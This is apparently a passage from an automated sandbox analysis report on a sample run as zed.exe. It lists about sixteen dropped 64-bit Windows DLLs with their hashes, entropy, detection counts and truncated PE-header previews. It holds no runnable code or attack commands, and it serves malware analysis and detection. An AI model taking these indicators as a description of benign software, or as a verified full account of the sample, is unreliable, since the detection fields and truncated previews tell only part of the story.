                                                                                                                                                                                                                                            SSDEEP:3:qn:qn
                                                                                                                                                                                                                                            MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                                                            SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                                                            SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                                                            SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:blat
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11264
                                                                                                                                                                                                                                            Entropy (8bit):4.640339306680604
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:dLklddyTHThob0q/tJRrlDfNYSOcqgYCWt:ZgcdZq/JJD6gRWt
                                                                                                                                                                                                                                            MD5:BCD8CAAF9342AB891BB1D8DD45EF0098
                                                                                                                                                                                                                                            SHA1:EE7760BA0FF2548F25D764F000EFBB1332BE6D3E
                                                                                                                                                                                                                                            SHA-256:78725D2F55B7400A3FCAFECD35AF7AEB253FBC0FFCDF1903016EB0AABD1B4E50
                                                                                                                                                                                                                                            SHA-512:8B6FB53AECB514769985EBFDAB1B3C739024597D9C35905E04971D5422256546F7F169BF98F9BAF7D9F42A61CFF3EE7A20664989D3000773BF5EDA10CB3A0C24
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                            • Filename: zed.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: Payload.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: Payload.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: Creal.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...Y..f.........." ................P........................................p............`..........................................'......0(..d....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata..Z.... ......................@..@.data...H....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..(....`.......*..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13824
                                                                                                                                                                                                                                            Entropy (8bit):5.0194545642425075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:4t/1nCuqaL0kt7AznuRmceS4lDFhAlcqgcLg:F/k1ACln4lDogcLg
                                                                                                                                                                                                                                            MD5:F19CB847E567A31FAB97435536C7B783
                                                                                                                                                                                                                                            SHA1:4C8BFE404AF28C1781740E7767619A5E2D2FF2B7
                                                                                                                                                                                                                                            SHA-256:1ECE1DC94471D6977DBE2CEEBA3764ADF0625E2203D6257F7C781C619D2A3DAD
                                                                                                                                                                                                                                            SHA-512:382DC205F703FC3E1F072F17F58E321E1A65B86BE7D9D6B07F24A02A156308A7FEC9B1A621BA1F3428FD6BB413D14AE9ECB2A2C8DD62A7659776CFFDEBB6374C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                            • Filename: zed.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: Payload.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: Payload.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...Z..f.........." ................P.....................................................`..........................................8......H9..d....`.......P..L............p..(....1...............................1..8............0...............................text...h........................... ..`.rdata..r....0......................@..@.data...H....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13312
                                                                                                                                                                                                                                            Entropy (8bit):5.037456384995606
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:st/1nCuqaL0ktPMn1ENe3erKr5br0YbsiDw6a9lkOcqgRGd:p/kpMIodrXbsiDS95gRGd
                                                                                                                                                                                                                                            MD5:DC14677EA8A8C933CC41F9CCF2BEDDC1
                                                                                                                                                                                                                                            SHA1:A6FB87E8F3540743097A467ABE0723247FDAF469
                                                                                                                                                                                                                                            SHA-256:68F081E96AE08617CF111B21EDED35C1774A5EF1223DF9A161C9445A78F25C73
                                                                                                                                                                                                                                            SHA-512:3ABA4CFCBBE4B350AB3230D488BD75186427E3AAAF38D19E0E1C7330F16795AD77FB6E26FF39AF29EAF4F5E8C42118CB680F90AFBFCA218AEDA64DC444675BA2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...Z..f.........." ................P.....................................................`......................................... 8.......8..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14336
                                                                                                                                                                                                                                            Entropy (8bit):5.09191874780435
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:rMVsiXeqVb0lIb0Pj5Jdfpm68WZDInU282tacqgYLg:rM7ali0Pj5JxCaDuUlgYLg
                                                                                                                                                                                                                                            MD5:C09BB8A30F0F733C81C5C5A3DAD8D76D
                                                                                                                                                                                                                                            SHA1:46FD3BA87A32D12F4EE14601D1AD73B78EDC81D1
                                                                                                                                                                                                                                            SHA-256:8A1B751DB47CE7B1D3BD10BEBFFC7442BE4CFB398E96E3B1FF7FB83C88A8953D
                                                                                                                                                                                                                                            SHA-512:691AC74FAE930E9CEABE782567EFB99C50DD9B8AD607DD7F99A5C7DF2FA2BEB7EDFE2EBB7095A72DA0AE24E688FBABD340EAE8B646D5B8C394FEE8DDD5E60D31
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...X..f.........." ................P.....................................................`.........................................`8.......8..d....`.......P..(............p..(....1...............................1..8............0...............................text............................... ..`.rdata..6....0....... ..............@..@.data...x....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):36352
                                                                                                                                                                                                                                            Entropy (8bit):6.541423493519083
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:f/UlZA5PUEllvxL/7v/iKBt5ByU0xGitqzSEkxGG7+tpKHb/LZ7fr52EkifcMxme:klcR7JriEbwDaS4j990th9VDBV
                                                                                                                                                                                                                                            MD5:0AB25F99CDAACA6B11F2ECBE8223CAD5
                                                                                                                                                                                                                                            SHA1:7A881B3F84EF39D97A31283DE6D7B7AE85C8BAE6
                                                                                                                                                                                                                                            SHA-256:6CE8A60D1AB5ADC186E23E3DE864D7ADF6BDD37E3B0C591FA910763C5C26AF60
                                                                                                                                                                                                                                            SHA-512:11E89EEF34398DF3B144A0303E08B3A4CAF41A9A8CA618C18135F561731F285F8CF821D81179C2C45F6EEB0E496D9DD3ECF6FF202A3C453C80AFEF8582D06C17
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." .....H...H......P.....................................................`.........................................p...........d...............................0......................................8............`...............................text...xG.......H.................. ..`.rdata.."6...`...8...L..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15360
                                                                                                                                                                                                                                            Entropy (8bit):5.367749645917753
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:YiJBj5fq/Rk0kPLhOZ3UucCWuSKPEkA2bD9JXx03cqg5YUMLgs:/k1kTMZEjCWNaA2DTx0g5YUMLg
                                                                                                                                                                                                                                            MD5:B6EA675C3A35CD6400A7ECF2FB9530D1
                                                                                                                                                                                                                                            SHA1:0E41751AA48108D7924B0A70A86031DDE799D7D6
                                                                                                                                                                                                                                            SHA-256:76EF4C1759B5553550AB652B84F8E158BA8F34F29FD090393815F06A1C1DC59D
                                                                                                                                                                                                                                            SHA-512:E31FD33E1ED6D4DA3957320250282CFD9EB3A64F12DE4BD2DFE3410F66725164D96B27CAA34C501D1A535A5A2442D5F070650FD3014B4B92624EE00F1C3F3197
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.z.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ......... ......P.....................................................`..........................................9......$:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0......."..............@..@.data...8....@.......2..............@....pdata.......P.......4..............@..@.rsrc........`.......8..............@..@.reloc..(....p.......:..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                                                            Entropy (8bit):5.41148259289073
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:w3d9FkHaz0EJvrj+CYuz7ucc9dG7otDr22KcqgOiewZjW:YkHEJzj+X6769lDzagO/w
                                                                                                                                                                                                                                            MD5:F14E1AA2590D621BE8C10321B2C43132
                                                                                                                                                                                                                                            SHA1:FD84D11619DFFDF82C563E45B48F82099D9E3130
                                                                                                                                                                                                                                            SHA-256:FCE70B3DAFB39C6A4DB85D2D662CB9EB9C4861AA648AD7436E7F65663345D177
                                                                                                                                                                                                                                            SHA-512:A86B9DF163007277D26F2F732ECAB9DBCA8E860F8B5809784F46702D4CEA198824FDEF6AB98BA7DDC281E8791C10EABA002ABDA6F975323B36D5967E0443C1E4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." ....."... ......P.....................................................`.........................................pI.......J..d....p.......`..................(....B...............................B..8............@...............................text...( .......".................. ..`.rdata..<....@.......&..............@..@.data...H....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..(............>..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20992
                                                                                                                                                                                                                                            Entropy (8bit):6.041302713678401
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:kUX0JfbRz5MLZA0nmwzMDYpJgLa0Mp8NDBcxgprAM:6NbRzWXwDqgLa1uBfP
                                                                                                                                                                                                                                            MD5:B127CAE435AEB8A2A37D2A1BC1C27282
                                                                                                                                                                                                                                            SHA1:2A7BF8BF7F24B2381370BA6B41FB640EE42BDCCD
                                                                                                                                                                                                                                            SHA-256:538B1253B5929254ED92129FA0957DB26CDDF34A8372BA0BF19D20D01549ADA3
                                                                                                                                                                                                                                            SHA-512:4FE027E46D5132CA63973C67BD5394F2AC74DD4BBCFE93CB16136FAB4B6BF67BECB5A0D4CA359FF9426DA63CA81F793BBF1B79C8A9D8372C53DCB5796D17367E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....$...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text....".......$.................. ..`.rdata.......@... ...(..............@..@.data...H....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..0............P..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):24576
                                                                                                                                                                                                                                            Entropy (8bit):6.530656045206549
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:cEDwUBi9SPu71omZXmrfXA+UA10ol31tuXVYdAgYj:FsUBXmoEXmrXA+NNxWFYfo
                                                                                                                                                                                                                                            MD5:2E15AA6F97ED618A3236CFA920988142
                                                                                                                                                                                                                                            SHA1:A9D556D54519D3E91FA19A936ED291A33C0D1141
                                                                                                                                                                                                                                            SHA-256:516C5EA47A7B9A166F2226ECBA79075F1A35EFFF14D87E00006B34496173BB78
                                                                                                                                                                                                                                            SHA-512:A6C75C4A285753CC94E45500E8DD6B6C7574FB7F610FF65667F1BEC8D8B413FC10514B7D62F196C2B8D017C308C5E19E2AEF918021FA81D0CB3D8CED37D8549A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...W..f.........." .....$...>............................................................`..........................................h.......i..d...............................0....a...............................a..8............@...............................text....#.......$.................. ..`.rdata..:-...@.......(..............@..@.data...H....p.......V..............@....pdata...............X..............@..@.rsrc................\..............@..@.reloc..0............^..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                                                                            Entropy (8bit):4.7080156150187396
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:lF/1n7Guqaj0ktfEJwX1fYwCODR3lncqg0Gd6l:RGXkJEm1feODxDg0Gd6
                                                                                                                                                                                                                                            MD5:40390F2113DC2A9D6CFAE7127F6BA329
                                                                                                                                                                                                                                            SHA1:9C886C33A20B3F76B37AA9B10A6954F3C8981772
                                                                                                                                                                                                                                            SHA-256:6BA9C910F755885E4D356C798A4DD32D2803EA4CFABB3D56165B3017D0491AE2
                                                                                                                                                                                                                                            SHA-512:617B963816838D649C212C5021D7D0C58839A85D4D33BBAF72C0EC6ECD98B609080E9E57AF06FA558FF302660619BE57CC974282826AB9F21AE0D80FBAA831A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...X..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12800
                                                                                                                                                                                                                                            Entropy (8bit):5.159963979391524
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:kblRgfeqfz0RP767fB4A84DgVD6eDcqgzbkLgmf:BwRj67p84Dg6eVgzbkLgmf
                                                                                                                                                                                                                                            MD5:899895C0ED6830C4C9A3328CC7DF95B6
                                                                                                                                                                                                                                            SHA1:C02F14EBDA8B631195068266BA20E03210ABEABC
                                                                                                                                                                                                                                            SHA-256:18D568C7BE3E04F4E6026D12B09B1FA3FAE50FF29AC3DEAF861F3C181653E691
                                                                                                                                                                                                                                            SHA-512:0B4C50E40AF92BC9589668E13DF417244274F46F5A66E1FC7D1D59BC281969BA319305BECEA119385F01CC4603439E4B37AFA2CF90645425210848A02839E3E7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^..6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...Jk.7?...J..7?..Rich6?..................PE..d...Y..f.........." ................P.....................................................`..........................................8......x9..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......(..............@....pdata..d....P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14848
                                                                                                                                                                                                                                            Entropy (8bit):5.270418334522813
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:vktJ1gifqQGRk0IP73AdXdmEEEEEm9uhiFEQayDZVMcqgnF6+6Lg:vkdU1ID3AdXd49urQPDggnUjLg
                                                                                                                                                                                                                                            MD5:C4C525B081F8A0927091178F5F2EE103
                                                                                                                                                                                                                                            SHA1:A1F17B5EA430ADE174D02ECC0B3CB79DBF619900
                                                                                                                                                                                                                                            SHA-256:4D86A90B2E20CDE099D6122C49A72BAE081F60EB2EEA0F76E740BE6C41DA6749
                                                                                                                                                                                                                                            SHA-512:7C06E3E6261427BC6E654B2B53518C7EAA5F860A47AE8E80DC3F8F0FED91E122CB2D4632188DC44123FB759749B5425F426CD1153A8F84485EF0491002B26555
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^z.6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...J..7?...J..7?..Rich6?..........................PE..d...Y..f.........." ......... ......P.....................................................`.........................................`9.......:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):56832
                                                                                                                                                                                                                                            Entropy (8bit):4.231032526864278
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:0qcmHBeNL1dO/qHkpnYcZiGKdZHDLY84vnKAnK2rZA21agVF:fEiqHHx4vZDV
                                                                                                                                                                                                                                            MD5:F9E266F763175B8F6FD4154275F8E2F0
                                                                                                                                                                                                                                            SHA1:8BE457700D58356BC2FA7390940611709A0E5473
                                                                                                                                                                                                                                            SHA-256:14D2799BE604CBDC668FDE8834A896EEE69DAE0E0D43B37289FCCBA35CEF29EC
                                                                                                                                                                                                                                            SHA-512:EB3E37A3C3FF8A65DEF6FA20941C8672A8197A41977E35AE2DC6551B5587B84C2703758320559F2C93C0531AD5C9D0F6C36EC5037669DC5CE78EB3367D89877B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....6...................................................0............`.................................................\...d...............l............ ..0... ...............................@...8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...H...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):57344
                                                                                                                                                                                                                                            Entropy (8bit):4.252429732285762
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:J4cmHBeIzNweVy/CHkRnYcZiGKdZHDLq80vnKAnKBrZGsURygUX:GEO6CHnX0vZb7
                                                                                                                                                                                                                                            MD5:DECF524B2D53FCD7D4FA726F00B3E5FC
                                                                                                                                                                                                                                            SHA1:E87C6ED4004F2772B888C5B5758AA75FE99D2F6F
                                                                                                                                                                                                                                            SHA-256:58F7053EE70467D3384C73F299C0DFD63EEF9744D61D1980D9D2518974CA92D4
                                                                                                                                                                                                                                            SHA-512:EAFF4FD80843743E61CE635FBADF4E5D9CF2C3E97F3C48350BD9E755F4423AC6867F9FE8746BD5C54E1402B18E8A55AEEF7ACA098C7CF4186DC4C1235EB35DF2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....8...................................................0............`.....................................................d............................ ..0... ...............................@...8............P...............................text...X7.......8.................. ..`.rdata......P.......<..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                                                            Entropy (8bit):4.690163963718492
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:Yddz2KTnThIz0qfteRY4zp+D3PLui8p1cqgHCWt:k2E9RqfCXp+D3juRpLgiWt
                                                                                                                                                                                                                                            MD5:80BB1E0E06ACAF03A0B1D4EF30D14BE7
                                                                                                                                                                                                                                            SHA1:B20CAC0D2F3CD803D98A2E8A25FBF65884B0B619
                                                                                                                                                                                                                                            SHA-256:5D1C2C60C4E571B88F27D4AE7D22494BED57D5EC91939E5716AFA3EA7F6871F6
                                                                                                                                                                                                                                            SHA-512:2A13AB6715B818AD62267AB51E55CD54714AEBF21EC9EA61C2AEFD56017DC84A6B360D024F8682A2E105582B9C5FE892ECEBD2BEF8A492279B19FFD84BC83FA5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................0'.......'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22016
                                                                                                                                                                                                                                            Entropy (8bit):6.1215844022564285
                                                                                                                                                                                                                                            Encrypted:false
